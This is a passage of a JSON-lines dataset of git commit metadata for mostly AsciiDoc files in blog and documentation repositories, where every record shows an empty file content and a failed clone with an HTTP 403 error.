idge\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jvz\/spring-boot,dreis2211\/spring-boot,olivergierke\/spring-boot,Nowheresly\/spring-boot,brettwooldridge\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,lenicliu\/spring-boot,SaravananParthasarathy\/SPSDemo,sebastiankirsch\/spring-boot,lenicliu\/spring-boot,michael-simons\/spring-boot,nebhale\/spring-boot,minmay\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,rweisleder\/spring-boot,bjornlindstrom\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,htynkn\/spring-boot,Nowheresly\/spring-boot,chrylis\/spring-boot,brettwooldridge\/spring-boot,hello2009chen\/spring-boot,linead\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,nebhale\/spring-boot,jbovet\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,bijukunjummen\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,ollie314\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,sebastiankirsch\/spring-boot,chrylis\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,izeye\/spring-boot,olivergierke\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,pvorb\/spring-boot,mosoft521\/spring-boot,joshiste\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,thomasdarimont\/spring-boot,joshthornhill\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,minmay\/spring-boot,jmnarloch\/spring-boot,felipeg48\/spring-boot,bbrouwer\/spring-boot,RichardCSantana\/spring-boot,linead\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,afroje-reshma\/spring-boot-sample,spring-projects\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,htynkn\/spring-boot,afroje-reshma\/spring-boot-sample,candrews\/spring-boot,jbovet\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,qerub\/spring-boot,SaravananParthasarathy\/SPSDemo,vpavic\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,izeye\/spring-boot,akmaharshi\/jenkins,hqrt\/jenkins2-course-spring-
boot,kamilszymanski\/spring-boot,mbogoevici\/spring-boot,nebhale\/spring-boot,joshiste\/spring-boot,htynkn\/spring-boot,sbcoba\/spring-boot,jvz\/spring-boot,neo4j-contrib\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,olivergierke\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,linead\/spring-boot,felipeg48\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,qerub\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,NetoDevel\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,mbogoevici\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,javyzheng\/spring-boot,royclarkson\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,i007422\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,RichardCSantana\/spring-boot,javyzheng\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,lexandro\/spring-boot,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,pvorb\/spring-boot,philwebb\/spring-boot-concourse,scottfrederick\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,bbrouwer\/spring-boot,bclozel\/spring-boot,kamilszymanski\/spring-boot,xiaoleiPENG\/my-project,NetoDevel\/spring-boot,tsachev\/spring-boot,Buzzardo\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,donhuvy\/spring-boot,minmay\/spring-boot,SaravananParthasarathy\/SPSDemo,mevasaroj\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,javyzheng\/spring-boot,mbogoevici\/spring-boot,donhuvy\/spring-boot,herau\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,i007422\/jenkins2-course-spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,i007422\/jenkins2-course-spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,sebastiankirsch\/spring-boot,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,afroje-reshma\/spring-boot-sample,shangyi0102\/spring-boot,olivergierke\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,jxblum\/spring-boot,hqrt\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,jmnarloch\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,wilkinsona\/spring-boot,vakninr\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,bclozel\/spring-boot,deki\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,lexandro\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,jvz\/spring-boot,sebastiankirsch\/spring-boot,yangdd1205\/spring-boot,rweisleder\/spring-boot,sbcoba\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,qerub\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot-concourse,neo4j-contrib\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,dreis2211\/s
pring-boot,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,eddumelendez\/spring-boot,DeezCashews\/spring-boot,yangdd1205\/spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38ae986d98a749a7de01fcac6ae820bb1a72b806","subject":"y2b create post Upgrade Your Macbook Pro (SSD Upgrade, RAM Upgrade, Optical Drive Bay Adapter)","message":"y2b create post Upgrade Your Macbook Pro (SSD Upgrade, RAM Upgrade, Optical Drive Bay Adapter)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-28-Upgrade-Your-Macbook-Pro-SSD-Upgrade-RAM-Upgrade-Optical-Drive-Bay-Adapter.adoc","new_file":"_posts\/2012-12-28-Upgrade-Your-Macbook-Pro-SSD-Upgrade-RAM-Upgrade-Optical-Drive-Bay-Adapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40666d7099d8ec12e8c67ec344c39ea2eb99ce93","subject":"#50 Move changelog to git repo","message":"#50 Move changelog to git repo\n","repos":"vjuranek\/radargun-plugin,jenkinsci\/radargun-plugin,vjuranek\/radargun-plugin,jenkinsci\/radargun-plugin,jenkinsci\/radargun-plugin,vjuranek\/radargun-plugin","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vjuranek\/radargun-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"104f7753182c5b09a905d8a6dd72df6f97f7e15b","subject":"y2b create post iPhone 5 Black vs iPhone 5 White (Should you buy the iPhone 5 Black or White?)","message":"y2b create post iPhone 5 Black vs iPhone 5 White (Should you buy the iPhone 5 Black or White?)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-24-iPhone-5-Black-vs-iPhone-5-White-Should-you-buy-the-iPhone-5-Black-or-White.adoc","new_file":"_posts\/2012-09-24-iPhone-5-Black-vs-iPhone-5-White-Should-you-buy-the-iPhone-5-Black-or-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab20418bc5b59c1c9bf047907a985838bc96a8c7","subject":"Renamed '_posts\/2016-11-14-My-English-Title.adoc' to '_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc'","message":"Renamed '_posts\/2016-11-14-My-English-Title.adoc' to '_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc'","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc","new_file":"_posts\/2016-11-14-Functional-IO-with-F-S-Streams.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e214cfd0c2e0dfa5a239cde8539ce76cfac72a2","subject":"wip on externs guide","message":"wip on externs guide\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/externs.adoc","new_file":"content\/guides\/externs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"60164402a05b3230b2d1ab7eed364bab2b00ef13","subject":"ClojureX London 2017 event","message":"ClojureX London 2017 event\n\nCreated an event page for the ClojureX London 2017 conference","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurex-london.adoc","new_file":"content\/events\/2017\/clojurex-london.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e83869dbf794a1ce33d558c2061fce13f51ec636","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad8a5747f6c973f78deab09e6b88fe20ad8292fc","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09b4262a874861b40784b6bb85d1553291437ccc","subject":"Add 2.6-to-3.0 migration docs for Paginator.","message":"Add 2.6-to-3.0 migration docs for Paginator.\n","repos":"lift\/framework,lift\/framework,lift\/framework,lift\/framework","old_file":"docs\/migration\/2.6-to-3.0-paginator.adoc","new_file":"docs\/migration\/2.6-to-3.0-paginator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lift\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c40db140bfa0ce352059e1b273758068ef82234","subject":"Update 2016-11-08-232000-Tuesday-Evening.adoc","message":"Update 
2016-11-08-232000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-232000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-232000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41dd5782a165bbd1f3ac2479e3f6c230ed2e4b6","subject":"adding maturity file","message":"adding maturity file\n","repos":"apache\/incubator-johnzon,salyh\/incubator-johnzon,salyh\/incubator-johnzon,apache\/incubator-johnzon","old_file":"MATURITY.adoc","new_file":"MATURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/salyh\/incubator-johnzon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35a01ba6c0acf77c1323e98601cfc4b5321fad5d","subject":"Update docker instructions (#253)","message":"Update docker instructions (#253)\n\n- Mention public repository\r\n- Building the docker image pulls the latest release","repos":"jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b765272a42ec68f0d778a4e3692d6e66eb146e7","subject":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","message":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4b9c187386a2018603fba40162b611742ca9fdd","subject":"y2b create post Make Coca-Cola At Home?","message":"y2b create post Make Coca-Cola At 
Home?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-24-Make-CocaCola-At-Home.adoc","new_file":"_posts\/2015-11-24-Make-CocaCola-At-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f099859e4ff04eb1741dcb330412a2b2a046d690","subject":"Update 2016-11-07-235200-Monday-Evening.adoc","message":"Update 2016-11-07-235200-Monday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-235200-Monday-Evening.adoc","new_file":"_posts\/2016-11-07-235200-Monday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1a0969e878809399125432dd8972ee680cd563a","subject":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","message":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6519532fcba55672d03c604b13ada6a637b5389","subject":"Update 2017-09-29-One-on-one-with-Isaac.adoc","message":"Update 2017-09-29-One-on-one-with-Isaac.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-29-One-on-one-with-Isaac.adoc","new_file":"_posts\/2017-09-29-One-on-one-with-Isaac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e266ed7e368869504b177826a8c78814af0fdce8","subject":"Add Environment Variables boilerplate to note(1)","message":"Add Environment Variables boilerplate to note(1)\n","repos":"rumpelsepp\/pynote","old_file":"man\/note.1.adoc","new_file":"man\/note.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33d6a9232873c5b60fb58ded74803ee86c3d8d94","subject":"Update 2017-01-27-FIX-harfbuzzso-not-found.adoc","message":"Update 2017-01-27-FIX-harfbuzzso-not-found.adoc","repos":"joaquinlpereyra\/joaquinlpereyra.github.io","old_file":"_posts\/2017-01-27-FIX-harfbuzzso-not-found.adoc","new_file":"_posts\/2017-01-27-FIX-harfbuzzso-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joaquinlpereyra\/joaquinlpereyra.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2c192488fc0be29aaa70be860b3e75326bc21618","subject":"Update installation instructions for fuse","message":"Update installation instructions for fuse\n","repos":"jorgemoralespou\/rtgov,Governance\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,Governance\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,Governance\/rtgov,djcoleman\/rtgov,objectiser\/rtgov,djcoleman\/rtgov,jorgemoralespou\/rtgov,Governance\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov","old_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/objectiser\/rtgov.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ea9579f054377abf3bdd7481f755e353f99ae9d","subject":"docs(migration): add initial Apiman migration guide","message":"docs(migration): add initial Apiman migration guide\n","repos":"apiman\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman,msavy\/apiman,apiman\/apiman","old_file":"docs\/modules\/migration\/pages\/migrations.adoc","new_file":"docs\/modules\/migration\/pages\/migrations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/apiman.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"824c15332a965c60364076981525483861ba23e8","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1670d47cb88f1da12b9ed51eeee2a6bda847c408","subject":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","message":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276a633e68ced82eaab66d0d4bd9665e3d872e52","subject":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","message":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c71b6f234bc0cf15ddc9e947d51f537d42b2a78a","subject":"Added work section","message":"Added work 
section\n","repos":"andrewazores\/homepage","old_file":"work.adoc","new_file":"work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"bde6d00a8949214bb98a2346e6323ca70b7a40cf","subject":"Update 2019-01-31-bleh.adoc","message":"Update 2019-01-31-bleh.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-bleh.adoc","new_file":"_posts\/2019-01-31-bleh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a90a39a81323bc954be91c3118f73f756cc9839","subject":"CL: `write` vs. `print` vs. `prin1` vs. `princ` vs. `pprint`","message":"CL: `write` vs. `print` vs. `prin1` vs. `princ` vs. `pprint`\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"99b6188c795a68df52363bbfda91574d31bc8295","subject":"Added server status doc","message":"Added server status doc\n","repos":"apaolini\/nagios-plugin-jbossas7,aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"server.asciidoc","new_file":"server.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fe2ed8df672cd2dd5caa5d030c705aa76c30251","subject":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","message":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b08db46ccdb8d70e7192df4c9ebaddf8823d948","subject":"Update 2017-05-27-Where-in-haskell.adoc","message":"Update 2017-05-27-Where-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-27-Where-in-haskell.adoc","new_file":"_posts\/2017-05-27-Where-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1730dab872fffcea4c42f706bac7e7b9e2c883f1","subject":"Update 2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","message":"Update 
2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","new_file":"_posts\/2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"538a59e9b715a8a977bfa2c2af341986013d9b1d","subject":"y2b create post COD MW3 MIDNIGHT LAUNCH!","message":"y2b create post COD MW3 MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-07-COD-MW3-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2011-11-07-COD-MW3-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 